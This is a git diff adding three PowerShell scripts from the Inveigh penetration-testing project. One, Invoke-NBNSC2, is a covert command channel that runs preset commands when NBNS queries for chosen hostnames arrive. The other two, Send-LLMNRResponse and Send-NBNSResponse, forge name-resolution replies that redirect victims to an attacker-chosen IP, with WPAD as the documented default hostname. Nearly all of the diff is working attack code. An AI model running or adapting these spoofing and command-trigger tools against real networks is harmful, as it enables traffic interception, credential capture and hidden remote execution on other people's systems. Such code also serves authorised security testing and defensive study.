3 files changed, 343 insertions, 0 deletions
diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1
new file mode 100644
index 0000000..41d2e64
--- /dev/null
+++ b/Extras/Invoke-NBNSC2.ps1
@@ -0,0 +1,151 @@
+function Invoke-NBNSC2
+{
+<#
+.SYNOPSIS
+Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are
+received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be
+sent from a NBNS enabled system on the same subnet using ping, etc.
+
+.PARAMETER Hostnames
+A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command
+from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]).
+
+.PARAMETER Commands
+An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets.
+
+.PARAMETER ExitHostname
+Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames.
+
+.PARAMETER RunTime
+(Integer) Set the run time duration.
+
+.PARAMETER RunTimeUnit
+Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days.
+
+.EXAMPLE
+Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+[CmdletBinding()]
+param
+(
+[parameter(Mandatory=$true)][Array]$Hostnames = "",
+[parameter(Mandatory=$true)][Array]$Commands = "",
+[parameter(Mandatory=$true)][String]$ExitHostname = "",
+[parameter(Mandatory=$false)][Int]$RunTime="",
+[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes",
+[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if($Hostnames.Count -ne $Commands.Count)
+{
+    throw "Must use an equal number of Hostnames and Commands."
+}
+elseif($Hostnames -contains $ExitHostname)
+{
+    throw "ExitHostname cannot be used as in Hostnames."
+}
+
+if($RunTime)
+{   
+    if($RunTimeUnit -like 'Minutes')
+    {
+        $runtime_timeout = new-timespan -Minutes $RunTime
+    }
+    elseif($RunTimeUnit -like 'Hours')
+    {
+        $runtime_timeout = new-timespan -Hours $RunTime
+    }
+    elseif($RunTimeUnit -like 'Days')
+    {
+        $runtime_timeout = new-timespan -Days $RunTime
+    }
+
+    $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+}
+
+$Hostnames = $Hostnames | % {$_.ToUpper()}
+$running = $true
+$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
+$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+$NBNS_UDP_client.Client.ReceiveTimeout = 10000
+$control_timeout = new-timespan -Seconds 1
+$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+while($running)
+{
+    try
+    {
+        $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
+    }
+    catch
+    {
+        $NBNS_request_data = $null
+    }
+
+    if($NBNS_request_data)
+    {
+        $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
+        $NBNS_query = $NBNS_query -replace "-00",""
+        $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
+        $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
+        $NBNS_query_string_subtracted = ""
+        $NBNS_query_string = ""
+        $n = 0
+                            
+        if($NBNS_query_string_encoded.Length -gt 1)
+        {
+            do
+            {
+                $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
+                $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
+                $n += 1
+            }
+            until($n -gt ($NBNS_query_string_encoded.Length - 1))
+                   
+            $n = 0
+                    
+            do
+            {
+                $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
+                $n += 2
+            }
+            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
+        }
+
+        if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout)
+        {
+            $NBNS_UDP_client.Close()
+            $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string)
+            $NBNS_query_string = ''
+            & $Commands[$command_index]
+            $control_timeout = new-timespan -Seconds 5
+            $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+            $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+            $NBNS_UDP_client.Client.ReceiveTimeout = 10000
+        }
+        elseif($ExitHostname -like $NBNS_query_string)
+        {
+            $running = $false
+        }
+    }
+
+    if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout)
+    {
+        $running = $false
+    }
+
+}
+
+$NBNS_UDP_client.Close()
+
+}
+\ No newline at end of file
diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1
new file mode 100644
index 0000000..cc22091
--- /dev/null
+++ b/Extras/Send-LLMNRResponse.ps1
@@ -0,0 +1,87 @@
+
+function Send-LLMNRResponse
+{
+<#
+.SYNOPSIS
+Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful,
+the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request.
+You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the
+target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response
+window. Ideally, this function would be fed by another script.
+
+.PARAMETER Hostname
+Default = WPAD: Specify a hostname for NBNS spoofing.
+
+.PARAMETER LLMNRTTL
+Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+
+.PARAMETER SendPort
+Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355
+which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine.
+
+.PARAMETER SpooferIP
+Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+other than the function host. 
+
+.PARAMETER TargetIP
+Specify an IP address to target for the LLMNR response.
+
+.PARAMETER TargetPort
+Specify an port to target for the LLMNR response. This port must match the source port included in the request.
+
+.EXAMPLE
+Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+
+[CmdletBinding()]
+param
+(
+[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
+[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
+[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
+[parameter(Mandatory=$true)][String]$Hostname = "",
+[parameter(Mandatory=$true)][Int]$TargetPort="",
+[parameter(Mandatory=$false)][Int]$SendPort="0",
+[parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
+[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if(!$SpooferIP)
+{ 
+    $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+}
+
+$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
+$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
+[Array]::Reverse($LLMNR_TTL_bytes)
+$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
+$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+$LLMNR_response_packet = $Transaction_ID_bytes +
+                                 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
+                                 $hostname_bytes.Count +
+                                 $hostname_bytes +
+                                 0x00,0x00,0x01,0x00,0x01 +
+                                 $hostname_bytes.Count +
+                                 $hostname_bytes +
+                                 0x00,0x00,0x01,0x00,0x01 +
+                                 $LLMNR_TTL_bytes +
+                                 0x00,0x04 +
+                                 ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+
+$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
+$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
+$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort)
+$send_socket.Connect($destination_point)
+$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
+$send_socket.Close()
+}
+\ No newline at end of file
diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1
new file mode 100644
index 0000000..3d5ed02
--- /dev/null
+++ b/Extras/Send-NBNSResponse.ps1
@@ -0,0 +1,105 @@
+
+function Send-NBNSResponse
+{
+<#
+.SYNOPSIS
+Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful,
+the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must
+have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target
+subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been
+able to get it to work manually by watching tshark with the the transaction ID being listed in the output.
+Ideally, this function would be fed by another script. 
+
+.PARAMETER Hostname
+Default = WPAD: Specify a hostname for NBNS spoofing.
+
+.PARAMETER NBNSTTL
+Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+
+.PARAMETER SendPort
+Default = 137: Specify a source port for the NBNS response.
+
+.PARAMETER SpooferIP
+IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+other than the function host. 
+
+.PARAMETER TargetIP
+IP address to target for the NBNS response.
+
+.PARAMETER TransactionID
+NBNS transaction ID that matches the transaction from the NBNS request.
+
+.EXAMPLE
+Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+
+[CmdletBinding()]
+param
+(
+[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
+[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
+[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
+[parameter(Mandatory=$true)][String]$Hostname = "",
+[parameter(Mandatory=$false)][Int]$SendPort="137",
+[parameter(Mandatory=$false)][Int]$NBNSTTL="165",
+[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if(!$SpooferIP)
+{ 
+    $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+}
+
+$Hostname = $Hostname.ToUpper()
+
+$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
+                  0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
+
+$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
+$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
+$hostname_encoded = $hostname_encoded.Replace("-","")
+$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
+$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+[Array]::Reverse($NBNS_TTL_bytes)
+$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
+$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+for($i=0; $i -lt $hostname_encoded.Count; $i++)
+{
+
+    if($hostname_encoded[$i] -gt 64)
+    {
+        $hostname_bytes[$i] = $hostname_encoded[$i] + 10
+    }
+    else
+    {
+        $hostname_bytes[$i] = $hostname_encoded[$i] + 17
+    }
+    
+}
+
+$NBNS_response_packet = $Transaction_ID_bytes +
+                        0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                        $hostname_bytes +
+                        0x00,0x20,0x00,0x01 +
+                        $NBNS_TTL_bytes +
+                        0x00,0x06,0x00,0x00 +
+                        ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
+                        0x00,0x00,0x00,0x00
+
+$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
+$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
+$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
+$send_socket.Connect($destination_point)
+$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
+$send_socket.Close()
+}
+\ No newline at end of file